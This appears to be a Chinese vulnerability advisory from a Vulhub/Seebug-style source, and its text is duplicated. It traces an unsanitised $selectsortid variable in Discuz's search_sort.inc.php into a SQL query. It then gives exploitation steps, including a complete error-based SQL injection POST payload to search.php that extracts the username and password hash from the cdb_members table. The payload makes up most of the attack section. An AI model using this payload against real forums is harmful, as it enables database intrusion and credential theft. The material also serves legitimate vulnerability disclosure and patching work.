VULHUB ™

<p>在文件/include/search_sort.inc.php150行<br></p><pre class="">@include_once DISCUZ_ROOT.'./forumdata/cache/threadsort_'.$selectsortid.'.php'; </pre><p>这个$selectsortid变量没有做过任何处理，而且最后进入到了170行的SQL语句<br></p><pre class="">$query = $db-&gt;query("SELECT tid FROM {$tablepre}optionvalue$selectsortid ".($sqlsrch ? 'WHERE '.$sqlsrch : '').""); </pre><p>导致了SQL注入的产生<br></p><p><br></p><p>漏洞利用过程</p><p><br></p><p>1.登陆论坛</p><p>2.访问</p><p><a href="http://xxxx.com/search.php">http://xxxx.com/search.php</a></p><p>post数据:</p><pre class="">formhash=1&amp;srchtype=threadsort&amp;st=on&amp;sortid=3&amp;searchsubmit=true&amp;selectsortid=3 where tid =1 and (select 1 from (select count(*),concat((select (select (select concat(username,0x3a,password) from cdb_members limit 1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23&amp;srcchtxt=aaa </pre><p><img alt="1.png" src="https://images.seebug.org/@/uploads/1434683988673-1.png"...

<p>在文件/include/search_sort.inc.php150行<br></p><pre class="">@include_once DISCUZ_ROOT.'./forumdata/cache/threadsort_'.$selectsortid.'.php'; </pre><p>这个$selectsortid变量没有做过任何处理，而且最后进入到了170行的SQL语句<br></p><pre class="">$query = $db-&gt;query("SELECT tid FROM {$tablepre}optionvalue$selectsortid ".($sqlsrch ? 'WHERE '.$sqlsrch : '').""); </pre><p>导致了SQL注入的产生<br></p><p><br></p><p>漏洞利用过程</p><p><br></p><p>1.登陆论坛</p><p>2.访问</p><p><a href="http://xxxx.com/search.php">http://xxxx.com/search.php</a></p><p>post数据:</p><pre class="">formhash=1&amp;srchtype=threadsort&amp;st=on&amp;sortid=3&amp;searchsubmit=true&amp;selectsortid=3 where tid =1 and (select 1 from (select count(*),concat((select (select (select concat(username,0x3a,password) from cdb_members limit 1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23&amp;srcchtxt=aaa </pre><p><img alt="1.png" src="https://images.seebug.org/@/uploads/1434683988673-1.png" data-image-size="865,296"><br></p>